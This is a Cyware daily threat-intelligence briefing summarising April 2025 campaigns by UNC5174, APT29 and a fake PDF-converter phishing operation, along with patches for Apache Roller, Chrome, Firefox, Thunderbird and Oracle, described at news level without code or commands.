Cyware Daily Threat Intelligence, April 16, 2025
Daily Threat Briefing • April 16, 2025
UNC5174 is keeping it quiet and clean. Since late 2024, the Chinese state-linked group has been targeting Linux environments using a domain-squatting infrastructure to deliver SNOWLIGHT malware and a new RAT. The campaign leans on stealth, — WebSockets for C2, bash scripts for delivery, and zero on-disk footprint — pointing to a mix of espionage and access brokering.
It looks like a PDF tool, acts like malware. A new phishing campaign is spoofing a legitimate website to deliver a stealthy SectopRAT variant. Victims are funneled through cloned interfaces and fake CAPTCHAs before unknowingly executing PowerShell commands that drop the payload.
Browser security just got a round of urgent fixes. Chrome 135 and Firefox 137 patch several critical bugs, including memory corruption issues that could lead to remote code execution. Thunderbird updates close off serious risks too.
Top Malware Reported in the Last 24 Hours
UNC5174 drops new VShell RAT
Sysdig uncovered a new campaign by Chinese state-linked group UNC5174, active since late 2024. The group used a malicious bash script to deliver the SNOWLIGHT malware and fileless VShell RAT via domain-squatting-based infrastructure. UNC5174 targeted Linux systems, using WebSockets for stealthy C2. Their techniques, victims, and infrastructure pointed to espionage and access brokering, with operations traced back to November 2024.
APT29 campaign targets European diplomats
Check Point Research uncovered a phishing campaign by Russian APT29, targeting European diplomatic entities using fake wine-tasting event invites. The attackers impersonated a European foreign ministry and used a new loader, GRAPELOADER, to deploy a variant of their WINELOADER backdoor. GRAPELOADER handled fingerprinting, persistence, and payload delivery, while the updated WINELOADER acted as a modular backdoor. Both shared stealth techniques and obfuscation methods.
PDF-to-DOCX scam delivers malware
CloudSEK uncovered a phishing campaign where threat actors mimicked the legit pdfcandy[.]com site to distribute malware. Users were tricked into running a PowerShell command, triggering the download of a ZIP payload containing ArechClient2, an advanced SectopRAT variant. This info-stealer harvests sensitive data and leverages MSBuild for stealthy execution. The attack combined fake captchas, UI cloning, and redirection chains.
Top Vulnerabilities Reported in the Last 24 Hours
Maximum severity bug in Apache Roller
Apache Roller patched a critical vulnerability (CVE-2025-24859) that allowed continued access to active sessions even after a password change. Caused by insufficient session expiration, the flaw could enable attackers to maintain access via hijacked sessions, including those with admin privileges. Version 6.1.5 addresses the issue with centralized session management.
Chrome 135 and Firefox 137 updates
Google and Mozilla released security updates for Chrome 135 and Firefox 137 to patch critical and high-severity vulnerabilities. Chrome fixes include a heap buffer overflow (CVE-2025-3619) and a use-after-free bug (CVE-2025-3620) that could enable arbitrary code execution. Firefox patched CVE-2025-3608, a race condition in HTTP handling. Thunderbird updates addressed two high-severity flaws that could expose hashed Windows credentials or directory listings. While no active exploitation has been reported, users are urged to update immediately.
Oracle patches 180 flaws
Oracle’s April 2025 Critical Patch Update included 378 security patches, with 255 addressing remotely exploitable, unauthenticated vulnerabilities. Oracle Communications received the most fixes (103), followed by MySQL, Fusion Middleware, and Financial Services. Around 40 patches addressed critical-severity flaws. Additional updates were issued for Solaris and Linux, with dozens of patches for remotely exploitable bugs.